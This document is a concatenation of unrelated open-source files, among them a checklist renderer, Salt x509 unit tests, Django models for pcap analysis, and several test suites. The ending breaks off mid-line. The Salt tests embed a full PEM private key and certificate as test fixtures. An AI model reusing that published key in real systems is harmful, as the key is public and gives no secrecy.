@presentation.render_for(Checklists, 'badge') def render_Checklists_badge(self, h, comp, model): if self.checklists: h << h.span(h.i(class_='icon-list'), ' ', self.nb_items, u' / ', self.total_items, class_='label') return h.root @presentation.render_for(Checklist) def render_Checklist(self, h, comp, model): with h.div(id='checklist_%s' % self.id, class_='checklist'): with h.div(class_='title'): h << self.title if self.title.model != 'edit': h << h.a(h.i(class_='icon-cross'), class_='delete').action(comp.answer, 'delete') with h.div(class_='content'): if self.items: h << comp.render(h, 'progress') with h.ul: for index, item in enumerate(self.items): h << h.li(item.on_answer(lambda v, index=index: self.delete_item(index)), id='checklist_item_%s' % item().id) h << self.new_item return h.root @presentation.render_for(Checklist, 'progress') def render_Checklist_progress(self, h, comp, model): progress = self.progress with h.div(class_='progress progress-success'): h << h.div(class_='bar', style='width:%s%%' % progress) h << h.span(progress, u'%', class_='percent') return h.root @presentation.render_for(ChecklistItem) def render_ChecklistItem(self, h, comp, model): h << h.a(h.i(class_='icon-checkbox-' + ('checked' if self.done else 'unchecked'))).action(self.set_done) h << h.span(self.title, class_='done' if self.done else '') if not self.title.model == 'edit': h << h.a(h.i(class_='icon-cross'), class_='delete').action(comp.answer, 'delete') return h.root
saltstack/salt
tests/unit/states/test_x509.py
Python
apache-2.0
5,661
0
import tempfile import salt.utils.files from salt.modules import x509 as x509_mod from salt.states import x509 from tests.support.helpers import dedent from tests.support.mixins import LoaderModuleMockMixin from tests.support.mock import MagicMock from tests.support.unit import TestCase, skipIf try: import M2Crypto # pylint: disable=unused-import HAS_M2CRYPTO = True except ImportError: HAS_M2CRYPTO = False class X509TestCase(TestCase, LoaderModuleMockMixin): def setup_loader_modules(self): return {x509: {"__opts__": {"fips_mode": False}}} def test_certificate_info_matches(self): cert_info = {"MD5 Finger Print": ""} required_info = {"MD5 Finger Print": ""} ret = x509._certificate_info_matches(cert_info, required_info) assert ret == (True, []) class X509FipsTestCase(TestCase, LoaderModuleMockMixin): def setup_loader_modules(self): self.file_managed_mock = MagicMock() self.file_man
aged_mock.return_value = {"changes": True} return { x509: { "__opts__": {"fips_mode": True}, "__salt__": { "x509.get_pem_entry": x509_mod.get_pem_entry, "x509.get_private_key_size": x509_mod.get_private_key_size, },
"__states__": {"file.managed": self.file_managed_mock}, } } @skipIf(not HAS_M2CRYPTO, "Skipping, M2Crypto is unavailable") def test_private_key_fips_mode(self): """ :return: """ test_key = dedent( """ -----BEGIN PRIVATE KEY----- MIIEvgIBADANBgkqhkiG9w0BAQEFAASCBKgwggSkAgEAAoIBAQDx7UUt0cPi5G51 FmRBhAZtZb5x6P0PFn7GwnLmSvLNhCsOcD/vq/yBUU62pknzmOjM5pgWTACZj66O GOFmWBg06v8+sqUbaF9PZ/CxQD5MogmQhYNgfyuopHWWgLXMub2hlP+15qGohkzg Tr/mXp2ohVAb6ihjqb7XV9MiZaLNVX+XWauM8SlhqXMiJyDUopEGbg2pLsHhIMcX 1twLlyDja+uDbCMZ4jDNB+wsWxTaPRH8KizfEabB1Cl+fdyD10pSAYcodOAnlkW+ G/DX2hwb/ZAM9B1SXTfZ3gzaIIbqXBEHcZQNXxHL7szBTVcOmfx/RPfOeRncytb9 Mit7RIBxAgMBAAECggEAD4Pi+uRIBsYVm2a7OURpURzEUPPbPtt3d/HCgqht1+ZR CJUEVK+X+wcm4Cnb9kZpL7LeMBfhtfdz/2LzGagurT4g7nlwg0h3TFVjJ0ryc+G0 cVNOsKKXPzKE5AkPH7kNw04V9Cl9Vpx+U6hZQEHzJHqgP5oNyw540cCtJriT700b fG1q3PYKWSkDwTiUnJTnVLybFIKQC6urxTeT2UWeiBadfDY7DjI4USfrQsqCfGMO uWPpOOJk5RIvw5r0Of2xvxV76xCgzVTkgtWjBRMTEkfeYx3019xKlQtAKoGbZd1T tF8DH0cDlnri4nG7YT8yYvx/LWVDg12E6IZij1X60QKBgQD7062JuQGEmTd99a7o 5TcgWYqDrmE9AEgJZjN+gnEPcsxc50HJaTQgrkV0oKrS8CMbStIymbzMKWifOj7o gvQBVecydq1AaXePt3gRe8vBFiP4cHjFcSegs9FDvdfJR36iHOBIgEp4DWvV1vgs +z82LT6Qy5kxUQvnlQ4dEaGdrQKBgQD175f0H4enRJ3BoWTrqt2mTAwtJcPsKmGD 9YfFB3H4+O2rEKP4FpBO5PFXZ0dqm54hDtxqyC/lSXorFCUjVUBero1ECGt6Gnn2 TSnhgk0VMxvhnc0GReIt4K9WrXGd0CMUDwIhFHj8kbb1X1yqt2hwyw7b10xFVStl sGv8CQB+VQKBgAF9q1VZZwzl61Ivli2CzeS/IvbMnX7C9ao4lK13EDxLLbKPG/CZ UtmurnKWUOyWx15t/viVuGxtAlWO/rhZriAj5g6CbVwoQ7DyIR/ZX8dw3h2mbNCe buGgruh7wz9J0RIcoadMOySiz7SgZS++/QzRD8HDstB77loco8zAQfixAoGBALDO FbTocfKbjrpkmBQg24YxR9OxQb/n3AEtI/VO2+38r4h6xxaUyhwd1S9bzWjkBXOI poeR8XTqNQ0BR422PTeUT3SohPPcUu/yG3jG3zmta47wjjPDS85lqEgtGvA0cPN7 srErcatJ6nlOnGUSw9/K65y6lFeH2lIZ2hfwNM2dAoGBAMVCc7i3AIhLp6UrGzjP 0ioCHCakpxfl8s1VQp55lhHlP6Y4RfqT72Zq7ScteTrisIAQyI9ot0gsuct2miQM nyDdyKGki/MPduGTzzWlBA7GZEHnxbAILH8kWJ7eE/Nh7zdF1CRts8utEO9L9S+0 lVz1j/xGOseQk4cVos681Wpw -----END PRIVATE KEY-----""" ) test_cert = dedent( """ -----BEGIN CERTIFICATE----- MIIDazCCAlOgAwIBAgIUAfATs1aodKw11Varh55msmU0LoowDQYJKoZIhvcNAQEL BQAwRTELMAkGA1UEBhMCQVUxEzARBgNVBAgMClNvbWUtU3RhdGUxITAfBgNVBAoM GEludGVybmV0IFdpZGdpdHMgUHR5IEx0ZDAeFw0yMTAzMjMwMTM4MzdaFw0yMjAz MjMwMTM4MzdaMEUxCzAJBgNVBAYTAkFVMRMwEQYDVQQIDApTb21lLVN0YXRlMSEw HwYDVQQKDBhJbnRlcm5ldCBXaWRnaXRzIFB0eSBMdGQwggEiMA0GCSqGSIb3DQEB AQUAA4IBDwAwggEKAoIBAQDx7UUt0cPi5G51FmRBhAZtZb5x6P0PFn7GwnLmSvLN hCsOcD/vq/yBUU62pknzmOjM5pgWTACZj66OGOFmWBg06v8+sqUbaF9PZ/CxQD5M ogmQhYNgfyuopHWWgLXMub2hlP+15qGohkzgTr/mXp2ohVAb6ihjqb7XV9MiZaLN VX+XWauM8SlhqXMiJyDUopEGbg2pLsHhIMcX1twLlyDja+uDbCMZ4jDNB+wsWxTa PRH8KizfEabB1Cl+fdyD10pSAYcodOAnlkW+G/DX2hwb/ZAM9B1SXTfZ3gzaIIbq XBEHcZQNXxHL7szBTVcOmfx/RPfOeRncytb9Mit7RIBxAgMBAAGjUzBRMB0GA1Ud DgQWBBT0qx4KLhozvuWAI9peT/utYV9FITAfBgNVHSMEGDAWgBT0qx4KLhozvuWA I9peT/utYV9FITAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBCwUAA4IBAQDx tWvUyGfEwJJg1ViBa10nVhg5sEc6KfqcPzc2GvatIGJlAbc3b1AYu6677X04SQNA dYRA2jcZcKudy6eolPJow6SDpkt66IqciZYdbQE5h9elnwpZxmXlJTQTB9cEwyIk 2em5DKpdIwa9rRDlbAjAVJb3015MtpKRu2gsQ7gl5X2U3K+DFsWtBPf+0xiJqUiq rd7tiHF/zylubSyH/LVONJZ6+/oT/qzJfxfpvygtQWcu4b2zzME/FPenMA8W6Rau ZYycQfpMVc7KwqF5/wfjnkmfxoFKnkD7WQ3qFCJ/xULk/Yn1hrvNeIr+khX3qKQi Y3BMA5m+J+PZrNy7EQSa -----END CERTIFICATE----- """ ) fp, name = tempfile.mkstemp() with salt.utils.files.fopen(name, "w") as fd: fd.write(test_key) fd.write(test_cert) ret = x509.private_key_managed(name) self.file_managed_mock.assert_called_once() assert ( self.file_managed_mock.call_args.kwargs["contents"].strip() == test_key.strip() ) def test_certificate_info_matches(self): cert_info = {"MD5 Finger Print": ""} required_info = {"MD5 Finger Print": ""} ret = x509._certificate_info_matches(cert_info, required_info) assert ret == (False, ["MD5 Finger Print"])
ActiveState/code
recipes/Python/578947_Validate_product/recipe-578947.py
Python
mit
281
0.017794
import re print " Write product name : " nume_produs = raw_input() print
" Write product price : " cost_produs = input() if (nume_produs == re.sub('[^a-z]',"",nume_produs)): print ('%s %d'%(nume_produs,cost_produs)) else: print "Error
! You must tape letters" input()
evernym/zeno
plenum/test/buy_handler.py
Python
apache-2.0
1,707
0.001172
from _sha256 import sha256 from typing import Optional from common.serializers.serialization import domain_state_serializer from plenum.common.constants import DOMAIN_LEDGER_ID from plenum.common.request import Request from plenum.common.txn_util import get_payload_data, get_from, get_req_id from plenum.server.database_manager import DatabaseManager from plenum.server.request_handlers.handler_interfaces.write_request_handler import WriteRequestHandler from plenum.test.constants import BUY from stp_core.common.log import getlogger logger = getlogger() class BuyHandler(WriteRequestHandler): def __init__(self, database_manager: DatabaseManag
er): super().__init__(database_manager, BUY, DOMAIN_LEDGER_ID) def static_validation(self, request: Request): self._validate_request_type(request) def dynamic_validation(self, request: Request, req_pp_time: Optional[int]): self._validate_request_type(request) def update_
state(self, txn, prev_result, request, is_committed=False): self._validate_txn_type(txn) key = self.gen_state_key(txn) value = domain_state_serializer.serialize({"amount": get_payload_data(txn)['amount']}) self.state.set(key, value) logger.trace('{} after adding to state, headhash is {}'. format(self, self.state.headHash)) def gen_state_key(self, txn): identifier = get_from(txn) req_id = get_req_id(txn) return self.prepare_buy_key(identifier, req_id) @staticmethod def prepare_buy_key(identifier, req_id): return sha256('{}{}:buy'.format(identifier, req_id).encode()).digest() def __repr__(self): return "TestHandler"
toontownfunserver/Panda3D-1.9.0
direct/pyinst/tocfilter.py
Python
bsd-3-clause
4,386
0.007068
import os import finder import re import sys def makefilter(name, xtrapath=None): typ, nm, fullname = finder.identify(name, xtrapath) if typ in (finder.SCRIPT, finder.GSCRIPT, finder.MODULE): return ModFilter([os.path.splitext(nm)[0]]) if typ == finder.PACKAGE: return PkgFilter([fullname]) if typ == finder.DIRECTORY: return DirFilter([fullname]) if typ in (finder.BINARY, finder.PBINARY): return FileFilter([nm]) return FileFilter([fullname]) class _Filter: def __repr__(self): return '<'+self.__class__.__name__+' '+repr(self.elements)+'>' class _NameFilter(_Filter): """ A filter mixin that matches (exactly) on name """ def matches(self, res): return self.elements.get(res.name, 0) class _PathFilter(_Filter): """ A filter mixin that matches if the resource is below any of the paths""" def matches(self, res): p = os.path.normcase(os.path.abspath(res.path)) while len(p) > 3: p = os.path.dirname(p) if self.elements.get(p, 0): return 1 return 0 class _ExtFilter(_Filter): """ A filter mixin that matches based on file extensions (either way) """ include = 0 def matches(self, res): fnd = self.elements.get(os.path.splitext(res.path)[1], 0) if self.include: return not fnd return fnd class _TypeFilter(_Filter): """ A filter mixin that matches on resource type (either way) """ include = 0 def matches(self, res): fnd = self.elements.get(res.typ, 0) if self.include: return not fnd return fnd class _PatternFilter(_Filter): """ A filter that matches if re.search succeeds on the resource path """ def matches(self, res): for regex in self.elements: if regex.search(res.path): return 1 return 0 class ExtFilter(_ExtFilter): """ A file extension filter. ExtFilter(extlist, include=0) where extlist is a list of file extensions """ def __init__(self, extlist, include=0): self.elements = {} for ext in extlist: if ext[0:1] != '.': ext = '.'+ext self.elements[ext] = 1 self.include = include class TypeFilter(_TypeFilter): """ A filter for resource types. TypeFilter(typlist, include=0) where typlist is a subset of ['a','b','d','m','p','s','x','z'] """ def __init__(self, typlist, include=0): self.elements = {} for typ in typlist: self.elements[typ] = 1 self.include = include class FileFilter(_NameFilter): """ A filter for data files """ def __init__(sel
f, filelist): self.elements = {} for f in filelist: self.elements[f] = 1 class ModFilter(_NameFilter): """ A filter for Python modules. ModFilter(modlist) where modlist is eg ['macpath', 'dospath'] """ def __init__(self, modlist): self.elements = {} for mod in modlist:
self.elements[mod] = 1 class DirFilter(_PathFilter): """ A filter based on directories. DirFilter(dirlist) dirs may be relative and will be normalized. Subdirectories of dirs will be excluded. """ def __init__(self, dirlist): self.elements = {} for pth in dirlist: pth = os.path.normcase(os.path.abspath(pth)) self.elements[pth] = 1 class PkgFilter(_PathFilter): """At this time, identical to a DirFilter (being lazy) """ def __init__(self, pkglist): #warning - pkgs are expected to be full directories self.elements = {} for pkg in pkglist: pth = os.path.normcase(os.path.abspath(pkg)) self.elements[pth] = 1 class StdLibFilter(_PathFilter): """ A filter that excludes anything found in the standard library """ def __init__(self): pth = os.path.normcase(os.path.join(sys.exec_prefix, 'lib')) self.elements = {pth:1} class PatternFilter(_PatternFilter): """ A filter that excludes if any pattern is found in resource's path """ def __init__(self, patterns): self.elements = [] for pat in patterns: self.elements.append(re.compile(pat))
kermitfr/kermit-webui
src/webui/progress/views.py
Python
gpl-3.0
1,766
0.007361
''' Created on Nov 17, 2011 @author: mmornati ''' from django.http import HttpResponse from django.utils import simplejson as json import logging from celery.result import AsyncResult from webui.restserver.template import render_agent_template import sys logger = logging.getLogger(__name__) def get_progress(request, taskname, taski
d): logger.info("Requesting taskid: %s"%taskid) result = AsyncResult(taskid, backend=None, task_name=taskname) logger.info("TASKID: %s"%result.task_id) dict = {} if (result.state == 'PENDING'): dict
['state'] = 'Waiting for worker to execute task...' elif (result.state == 'PROGRESS'): dict['state'] = 'Operation in progress..' else: dict['state'] = result.state backend_response = None try: backend_response = result.result except: logger.warn(sys.exc_info()) if backend_response: if isinstance(result.result, tuple): response,content,agent,action=result.result if response.status == 200: json_data = render_agent_template(request, {}, content, {}, agent, action) return HttpResponse(json_data, mimetype="application/json") elif response.status == 408: dict['state'] = 'FAILURE' dict['message'] = 'TIMEOUT' else: if "current" in result.result and "total" in result.result: value = float(1.0*result.result['current']/result.result['total'])*100 dict['value'] = value else: dict.update({"responsecontent": result.result}) else: dict['value'] = 0 json_data = json.dumps(dict) return HttpResponse(json_data, mimetype="application/json")
oguzy/ovizart
ovizart/pcap/models.py
Python
gpl-3.0
5,743
0.003657
from django.db import models from djangotoolbox.fields import EmbeddedModelField, ListField from django_mongodb_engine.contrib import MongoDBManager import os # Create your models here. # save the created json file name path # only one file for summary should be kept here class UserJSonFile(models.Model): user_id = models.CharField(max_length=100) json_type = models.CharField(max_length=10) # possible value is summary for the summary view json_file_name = models.CharField(max_length=100) # save the name of the already created file name on disk class Flow(models.Model): user_id = models.CharField(max_length=100) hash_value = models.CharField(max_length=50) file_name = models.CharField(max_length=50) upload_time = models.DateTimeField() file_type = models.CharField(max_length=150) file_size = models.IntegerField() path = models.FilePathField() pcaps = ListField(EmbeddedModelField('Pcap', null=True, blank=True)) details = ListField(EmbeddedModelField('FlowDetails', null=True, blank=True)) def __unicode__(self): return u'%s/%s' % (self.path, self.file_name) def get_upload_path(self): hash_dir = os.path.basename(self.path) root = os.path.basename(os.path.dirname(self.path)) return os.path.join(root, hash_dir) class Pcap(models.Model): hash_value = models.CharField(max_length=100) file_name = models.FileField(upload_to="uploads", null=True, blank=True) path = models.FilePathField() packets = ListField(EmbeddedModelField('PacketDetails', null=True, blank=True)) def __unicode__(self): return u'%s/%s' % (self.path, self.file_name) def get_upload_path(self): hash_dir = os.path.basename(self.path) root = os.path.basename(os.path.dirname(self.path)) return os.path.join(root, hash_dir) # there should be also a table of fields that kepts the traffic bytes related with communication class PacketDetails(models.Model): #datetime.datetime.fromtimestamp(float("1286715787.71")).strftime('%Y-%m-%d %H:%M:%S') ident = models.IntegerField() flow_hash = models.CharField(max_length=50) timestamp = models.DateTimeField() length = models.IntegerField() protocol = models.IntegerField() src_ip = models.IPAddressField() dst_ip = models.IPAddressField() sport = models.IntegerField() dport = models.IntegerField() data = models.TextField(null=True, blank=True) def __unicode__(self): return u'(%s, %s, %s, %s, %s)' % (self.protocol, self.src_ip, self.sport, self.dst_ip, self.dport) objects = MongoDBManager() # save the ips at the applayerproto.log (http.log for ex) class FlowDetails(models.Model): parent_hash_value = models.CharField(max_length=50) user_id = models.CharField(max_length=100) src_ip = models.IPAddressField() dst_ip = models.IPAddressField() sport = models.IntegerField() dport = models.IntegerField() protocol = models.CharField(max_length=10) timestamp = models.DateTimeField() objects = MongoDBManager() class HTTPDetails(models.Model): # request or response http_type = models.CharField(max_length=10) # request fields method = models.CharField(max_length=5, null=True, blank=True) uri = models.URLField(null=True, blank=True) headers = models.TextField(null=True, blank=True) version = models.FloatField(null=True, blank=True) # request part ends # response fields # header and version is here also reason = models.CharField(max_length="5", null=True, blank=True) status = models.IntegerField(null=True, blank=True) # i might need body body = models.TextField(null=True, blank=True) content_type = models.CharField(max_length=25, null=True, blank=True) content_encoding = models.CharField(max_length=25, null=True, blank=True) # response ends # i might need files also files = ListField(null=True, blank=True) file_path = models.CharField(max_length=200, null=True, blank=True) flow_details = EmbeddedModelField('FlowDetails', null=True, blank=True) #for raw_qeuries, filtering according to flow_details will be possible objects = MongoDBManager() class DNSRequest(models.Model): type = models.IntegerField() human_readable_type = models.CharField(max_length=50) value = models.CharField(max_length=50, null=True, blank=True) flow_details = EmbeddedModelField('FlowDetails', null=True, blank=True) objects = MongoDBManager() class DNSResponse(models.Model): type = models.IntegerField() human_readable_type = models.CharField(max_length=50) value = ListField(null=True, blank=True) flow_details = EmbeddedModelField('FlowDetails', null=True, blank=True) objects = MongoDBManager() class SMTPDetails(models.Model): login_data = ListField(null=True, blank=True) msg_from = models.CharField(max_length=100, null=True, blank=True) rcpt_to = models.CharField(max_length=100, null=True, blank=True) raw = models.TextField(null=True, blank=True) msgdata = models.TextField(null=True, blank=True) attachment_path = ListField(null=True, blank=True) flow_details = EmbeddedModelField('FlowDetails', null=True, blank=True) objects = MongoDBManager() def get_path_dict(self): #/home/oguz/git/ovizart/ovizart/uploads/16-06-12/a6a6defb7253043a55281d01aa66538a/smtp-messages/1/part-001.ksh result = [] f
or path in self.attachment_path: tmp = dict() r = path.split("uploads") file_name = os.path.basename(r[1]) tmp['file_name'] = file_nam
e tmp['path'] = r[1] result.append(tmp) return result
DigitalCampus/django-oppia
tests/oppia/test_context_processors.py
Python
gpl-3.0
2,547
0
from django.urls import reverse from oppia.test import OppiaTestCase from reports.models import DashboardAccessLog class ContextProcessorTest(OppiaTestCase): fixtures = ['tests/test_user.json', 'tests/test_oppia.json', 'tests/test_quiz.json', 'tests/test_permissions.json', 'tests/test_course_permissions.json', 'tests/test_question_indices.json', 'tests/awards/award-course.json', 'tests/test_certificatetemplate.json'] # home page not logged in def test_get_home_not_logged_in(self): dal_start_count = DashboardAccessLog.objects.all().count() self.client.get(reverse('oppia:index')) dal_end_count = DashboardAccessLog.objects.all().count() # shouldn't add a log for non logged in users self.assertEqual(dal_start_count, dal_end_count) # home page - all users - get def test_get_home_logged_in(self): for user in (self.admin_user, self.normal_user, self.teacher_user, self.staff_user): self.client.force_login(user=user) dal_start_count = DashboardAccessLog.objects.all().count() self.client.get(reverse('oppia:inde
x'), follow=True) dal_end_count = DashboardAccessLog.objects.all().count()
self.assertEqual(dal_start_count+1, dal_end_count) # home page - all users - post def test_post_home_logged_in(self): for user in (self.admin_user, self.normal_user, self.teacher_user, self.staff_user): self.client.force_login(user=user) dal_start_count = DashboardAccessLog.objects.all().count() self.client.post(reverse('oppia:index'), follow=True, data={'test': 'mytest'}) dal_end_count = DashboardAccessLog.objects.all().count() self.assertEqual(dal_start_count+1, dal_end_count) # admin pages get def test_get_admin(self): dal_start_count = DashboardAccessLog.objects.all().count() self.client.force_login(user=self.admin_user) self.client.get(reverse('admin:oppia_course_changelist')) dal_end_count = DashboardAccessLog.objects.all().count() # shouldn't add a log for admin self.assertEqual(dal_start_count, dal_end_count) # admin pages post # api pages # sensitive info
tmtowtdi/MontyLacuna
lib/lacuna/captcha.py
Python
mit
5,055
0.017013
import os, requests, tempfile, time, webbrowser import lacuna.bc import lacuna.exceptions as err ### Dev notes: ### The tempfile containing the captcha image is not deleted until solveit() ### has been called. ### ### Allowing the tempfile to delete itself (delete=True during tempfile ### creation), or using the tempfile in conjunction with a 'with:' expression, ### have both been attempted. ### ### The problem is that, when using those auto-deletion methods, the tempfile ### is occasionally being removed from the system before the image viewer ### we're firing off actually gets a chance to read it. Everything is ### happening in the right order, it's just that the image viewer startup is ### too slow. ### ### Deleting the tempfile manually in solveit() works - don't decide to get ### clever and replace the unlink() in solveit() with some form of tempfile ### autodeletion without a lot of testing. class Captcha(lacuna.bc.LacunaObject): """ Fetches, displays, and solves graphical captchas. General usage will be:: cap = my_client.get_captcha() cap.showit() # display the captcha image cap.prompt_user() # ask the user for a solution cap.solveit() # check the user's solution """ path = 'captcha' @lacuna.bc.LacunaObject.call_returning_meth def fetch( self, **kwargs ): """ Fetches a captcha for the user to solve from the server. This mirrors the TLE API, but you generally don't need to call this. Returns a :class:`lacuna.captcha.Puzzle` object. """ return Puzzle( self.client, kwargs['rslt'] ) def showit( self ): """ Actually downloads the captcha image, and attempts to display it to the user in one of several browsers. If :meth:`fetch` is called first, :meth:`showit` uses that fetched data, but this is not necessary. :meth:`showit` will call fetch for you. Raises :class:`lacuna.exceptions.RequestError` if the image is not fetchable (network error or the TLE servers have gone down). Raises EnvironmentError if it cannot find an image viewer to use to display the captcha image. """ if not hasattr(self,'url') or not hasattr(self,'guid'): puzzle = self.fetch() self.url = puzzle.url self.guid = puzzle.guid img_resp = requests.get( self.url ) if img_resp.status_code != 200: raise err.RequestError("The captcha image URL is not responding.") f = tempfile.NamedTemporaryFile( suffix='.png', prefix='tle_capcha_', delete=False ); self.tempfile = f.name f.write( img_resp.content ) if hasattr(img_resp, 'connection'): img_resp.connection.close() local_url = 'file://' + f.name found_browser = False for b in [ None, 'windows-default', 'macosx', 'safari', 'firefox', 'google-chrome', 'chrome', 'chromium-browser', 'chromium' ]: try: browser = webbrowser.get( b ) browser.open( local_url, 0, True ) found_browser = True break except webbrowser.Error as e: pass if not found_browser
: raise EnvironmentError("Unable to find a browser to show the captcha image. Captcha solution is required.") def prompt_user(self): """ Prompts the user to solve the displayed captcha. It's not illegal to call this without first calling :meth:`solveit`, but doing so makes no sense. """
self.resp = input("Enter the solution to the captcha here: ") return self.resp def solveit(self): """ Sends the user's response to the server to check for accuracy. Returns True if the user's response was correct. Raises :class:`lacuna.exceptions.CaptchaResponseError` otherwise. """ if not hasattr(self,'resp'): raise AttributeError("You must prompt the user for a response before calling solveit().") try: self.solve( self.guid, self.resp ) except err.ServerError as e: raise err.CaptchaResponseError("Incorrect captcha response") finally: delattr( self, 'url' ) delattr( self, 'guid' ) delattr( self, 'resp' ) if os.path.isfile(self.tempfile): os.unlink( self.tempfile ) return True @lacuna.bc.LacunaObject.call_member_meth def solve( self, guid:str, solution:str, **kwargs ): """ Mirrors the TLE Captcha module's :meth:`solve` method, but unless you really need this and you really know why, use :meth:`solveit` instead. """ pass class Puzzle(lacuna.bc.SubClass): """ Object Attributes:: url FQ URL to the puzzle image guid uuid attached to the puzzle; must be passed back along with the solution. """
Teino1978-Corp/pre-commit
tests/commands/clean_test.py
Python
mit
711
0
from __future__ import unicode_literals import os.path from pre_commit.commands.clean import clean from pre_commit.util import rmtree def test_clean(runner_with_mocked_store): assert os.path.exists(runner_with_mocked_store.store.directory) clean(runner_with_mocked_store) assert not os.path.exists(runner_with_mocked_store.store.directory) def test_clean_empty(runner_with_mocked_store): """Make sure clean succeeds when we the directory doesn
't exist.""" rmtree(runner_with_mocked_store.store.directory) assert not os.p
ath.exists(runner_with_mocked_store.store.directory) clean(runner_with_mocked_store) assert not os.path.exists(runner_with_mocked_store.store.directory)
benpicco/mate-deskbar-applet
deskbar/interfaces/Controller.py
Python
gpl-2.0
1,455
0.010309
class Controller(object): def __init__(self, model): self._model = model self._view = None def register_view(self, view): self._view = view def on_quit(self, *args): raise NotImplementedError def on_keybinding_activated(self, core, time): raise NotImplementedError def on_show_about(self, sender): raise NotImplementedError def on_toggle_history(self, sender): raise NotImplementedError def on_show_preferences(self, sen
der): raise NotImplementedError def on_query_entry_changed(self, entry): raise NotImplementedError def on_query_entry_key_press_event(self, entry, event): raise NotImplementedError def on_query_entry_activate(self, entry): raise NotImplementedError def on_treeview_cursor_changed(self, treeview): raise NotImplementedError def on_match_selected(self,
treeview, text, match_obj, event): raise NotImplementedError def on_do_default_action(self, treeview, text, match_obj, event): raise NotImplementedError def on_action_selected(self, treeview, text, action, event): raise NotImplementedError def on_clear_history(self, sender): raise NotImplementedError def on_history_match_selected(self, history, text, match): raise NotImplementedError
NejcZupec/ggrc-core
test/integration/ggrc/converters/test_import_delete.py
Python
apache-2.0
744
0.002688
# Copyright (C) 2016 Google Inc. # Licensed under http://www.apache.org/licenses/LICENSE-2.0 <see LICENSE file>
from ggrc.converters import errors
from integration.ggrc import converters class TestBasicCsvImport(converters.TestCase): def setUp(self): converters.TestCase.setUp(self) self.client.get("/login") def test_policy_basic_import(self): filename = "ca_setup_for_deletion.csv" self.import_file(filename) filename = "ca_deletion.csv" response_data_dry = self.import_file(filename, dry_run=True) response_data = self.import_file(filename) self.assertEqual(response_data_dry, response_data) self.assertEqual(response_data[0]["deleted"], 2) self.assertEqual(response_data[0]["ignored"], 0)
chriswmackey/UWG_Python
setup.py
Python
gpl-3.0
1,278
0.000782
import setuptools with open("README.md", "r") as fh: long_description = fh.read() with open('requirements.txt') as f: requirements = f.read().splitlines() with open('cli-requirements.txt') as f: cli_requirements = f.read().splitlines() setuptools.setup( name="uwg", use_scm_version=True, setup_requires=['setuptools_scm'], author="Ladybug Tools", author_email="info@ladybug.tools", description="Python application for modeling the urban heat island effect.", long_description=long_description, long_description_content_type="text/markdown", url="https://github.com/ladybug-tools/uwg", packages=setuptools.find_packages(exclude=["tests*", "resources*"]), include_package_data=True, install_requires=requirements, extras_require={ 'cli': cli_requirements }, entry_points={ "console_scripts": ["uwg = uwg.cli:main"] }, classifiers=[ "Programming Language :: Python :: 2.7", "Programming Language :: Python :: 3.
6", "Programming Language :: Python :: 3.7", "Programming Language :: Python :: Implementation :: CPython", "License :: OSI Approved :: GNU General Public License v3 (GPLv3)", "Operating Sy
stem :: OS Independent" ], )
Rosslaew/OptiGear
gear/gear.py
Python
mit
2,681
0.012309
from collections import UserList from gear import ffxiv, xivdb from gear import power as p """Class representing a simple gear element. """ class Gear(object): """Gear(slot, item_id, **attributes) slot : in which slot of the gearset is this precise gear, as defined in ffxiv.slots. item_id : identifier from xivdb.com. Will load the gear from there if provided attributes : the attributes of the gear as defined in ffxiv.attributes. """ def __init__(self, slot, item_id = None, **attributes): if item_id is not None : attributes = xivdb.getId(item_id) assert(slot in ffxiv.slots) self.slot = slot # We filter out what is not a legitimate FFXIV attribute self.attributes = dict(filter( lambda a:a[0] in ffxiv.attributes, attributes.items())) # We put the rest in self.misc self.misc = dict(filter( lambda a:a[0] not in ffxiv.attributes, attributes.items())) """Class representing a complete gear set. Can be called by specifying the Lodestone ID for the character or by specifying the gear for each gear slot, as defined in ffxiv.slots. """ class GearSet(Gear): """GearSet(character_id, **gears) character_id : provide to load gearset from Lodestone. gears : pairs slot=Gear """ def __init__(self, character_id=None, **gears ): self.gears = {} # If we do not fetch the gearset from Lodestone if character_id is None: for s in ffxiv.slots: g = gears.get(s) assert(g is None or g.slot == s) self.gear[s] = g else: pass #TODO add fetching gearset from Lodestone # A GearSet is treated as a Gear, so we update the attributes attributes = { k : sum( [g.attributes.get(k,0) for g in self.gears.values() if g is not None ], start=0) for k in ffxiv.attributes} super().__init__(None,*attributes) """List of GearSets to compare. """ class GearSetList(UserList): """GearSetList(data) data : an iterable of gearsets
""" def __init__(self, data=[]): super().__init__(data) """maxPower(job,consraintList) Returns the best gearset for job given a list of constraints. """ def maxPower(self,job, constraintList=None): pass """Function to calculate the power of a gear for job. """ def power(gear, job): return sum([i
nt(gear.attributes.get(k,0))*v for k,v in ffxiv.weights[job].items()])
ChristosChristofidis/h2o-3
h2o-py/tests/testdir_munging/binop/pyunit_binop2_plus.py
Python
apache-2.0
3,072
0.008138
import sys sys.path.insert(1, "../../../") import h2o def binop_plus(ip,port): # Connect to h2o h2o.init(ip,port) iris = h2o.import_frame(path=h2o.locate("smalldata/iris/iris_wheader_65_rows.csv")) rows, cols = iris.dim() iris.show() ################################################################### # LHS: scaler, RHS: H2OFrame res = 2 + iris res_rows, res_cols = res.dim() assert res_rows == rows and res_cols == cols, "dimension mismatch" for x, y in zip([res[c].sum() for c in range(cols-1)], [469.9, 342.6, 266.9, 162.2]): assert abs(x - y) < 1e-1, "expected same values" # LHS: scaler, RHS: scaler res = 2 + iris[0] res2 = 1.1 + res[21,:] assert abs(res2 - 8.2) < 1e-1, "expected same values" ################################################################### # LHS: scaler, RHS: H2OFrame res = 1.2 + iris[2] res2 = res[21,:] + iris res2.show() # LHS: scaler, RHS: H2OVec res = 1.2 + iris[2] res2 = res[21,:] + iris[1] res2.show() # LHS: scaler, RHS: scaler res = 1.1 + iris[2] res2 = res[21,:] + res[10,:] assert abs(res2 - 5.2) < 1e-1, "expected same values" # LHS: scaler, RHS: scaler res = 2 + iris[0] res2 = res[21,:] + 3 assert abs(res2 - 10.1) < 1e-1, "expected same values" ################################################################### # LHS: H2OVec, RHS: H2OFrame #try: # res = iris[2] + iris # res.show() # assert False, "expected error. objects with different dimensions not supported." #except EnvironmentError: # pass # LHS: H2OVec, RHS: scaler res = 1.2 + iris[2] res2 = iris[1] + res[21,:] res2.show() ################################################################### # LHS: H2OFrame, RHS: H2OFrame res = iris + iris res_rows, res_cols = res.dim() assert res_rows == rows and res_cols == cols, "dimension mismatch" res = iris[0:2] + iris[1:3] res_rows, res_cols = res.dim() assert res_rows == rows and res_cols == 2, 